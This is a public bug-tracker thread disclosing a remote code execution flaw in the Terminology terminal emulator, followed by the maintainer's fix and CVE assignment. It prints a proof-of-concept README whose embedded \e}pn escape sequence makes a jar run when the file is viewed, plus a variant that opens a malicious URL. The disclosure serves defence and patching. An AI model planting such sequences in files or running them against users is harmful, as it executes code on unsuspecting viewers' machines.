Page MenuHomePhabricator

media_unknown_handle in \e}pn<FILE>\0 control sequence allows remote code execution (RCE)
Closed, ResolvedPublic

Description

Custom Control Sequence Remote Code Execution (RCE)

CVSSv3: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Affected Versions: Terminology <= 1.3

The catch all behaviour of the \e}pn control sequence in Terminology allow a remote attacker to execute code on the user's computer.

Background

Terminology includes several custom control sequences. These are activated with the \e} sequence.

The \e}pn sequence opens web pages and image files and is handled by the _popmedia function in win.c:4161.

Vulnerability

The \e}pn sequence allows a user to display media like an image or open a web page. However, all unknown media types are handled with the media_unknown_handle function which executes xdg-open against the file type. This creates a large attack surface that allows a remotely introduced executable file to be executed when that file's MIME type is registered for xdg-open.

This is true for most Linux systems with JRE/JDK installed and have registered. JRE registers java as the MIME handler for .jar files.

An attacker could therefore deliver a file containing the control sequence and a jar file causing the jar to be executed once the control sequence is rendered by Terminology.

Reproduce

To reproduce this unsafe behaviour, perform the following:

  1. Create a Java jar file containing a compiled class configured as the main class in the jar manifest (so it executes automatically)
  2. Run the following in the affected versions of terminology where <PATH> is the path to the jar file from #1.
printf "\e}pn<PATH>\0"

Exploit / PoC

Consider a Git project or source tarball uploaded to a site containing the following files:

README.md

# This is a simple README file

^[}pnexploit.jar^@

exploit.jar

When the Terminology user views the file with a program like cat:

cat README.md

the exploit.jar file will be executed without the user's knowledge.

Resolution

I would recommend that for the meantime all unknown media types be rejected by the control sequence. Currently Terminology has dedicated behaviour to handle the popup display of images and opening of web pages. Whereas all other media types are unsafely deferred to a remote program where the ability to prevent malicious behaviour is outside of the control of Terminology.

The media_unknown_handle function should be removed and not called from _popmedia.

Consider that other than the remote code execution (of high impact), an attacker could also open a malicious web page with the same sequence and conduct XSS and other attacks against the Terminology user.

For this reason, I'd also recommend that the \e}pn control sequence be disabled by default so that only users that really want it can ensure it's enabled with a startup flag like --extra-sequences.

pajexali triaged this task as High priority.
pajexali created this object with visibility "All Users".
billiob claimed this task.

You are right.
I'll fix it in Terminology 1.3.1 soon.

billiob changed the visibility from "All Users" to "Public (No Login Required)".Dec 16 2018, 2:35 AM

Thanks for looking into this.

Let me know if you want to discuss remediation strategies or help working on a patch.

I will get a CVE number assigned as this will likely affect the security of Terminology users until the patch is released.

I've removed media_unknown_handle().
The terminology escape codes can already be disabled in the settings panel.

How do you want to be credited?

Sounds good. Let me know when this is available in the Terminology master branch.

Having the \e}pn sequence enabled by default means that even with media_unknown_handle() removed, malicious web pages can still be opened in the same manner:

^[}pnhttp://basite.hacked\0

This would be less effective at compromising the operating system (as the attack is now limited to the browser's sandbox) but still gives significant control to a remote attacker.

My suggestion would be to also have this control sequence disabled by default so that only when a user aware of its functionality wants to enable it, then can launch their Terminology instance with a flag (like --custom-escapes) to enable it each time.

This is easy to do with a keybinding for your window manager, alias, script etc.

As for credit, please reference me as:

Ben N <pajexali@gmail.com>

\e}pn will no longer open a browser.

CVE-2018-20167 has now been assigned to this vulnerability and made public.

Thanks again for the quick investigation of this one.

jeyzu added a subscriber: jeyzu.Dec 17 2018, 7:09 AM

Hello,
I really miss my single left click on an url to open it through xdg-open.
Could this behaviour be restored, because to me it has nothing to do with the present issue.

I'll fix that soon. @jeyzu: Could I ask you to test the git version once I'll have it fixed?

jeyzu added a comment.Dec 17 2018, 8:00 AM

yep sure, I'm pulling/updating on a daily basis ;)

billiob reopened this task as Open.Dec 17 2018, 12:52 PM

It's working seamlessly, thanks a lot,
I little notification like "url opened" could be a plus ;)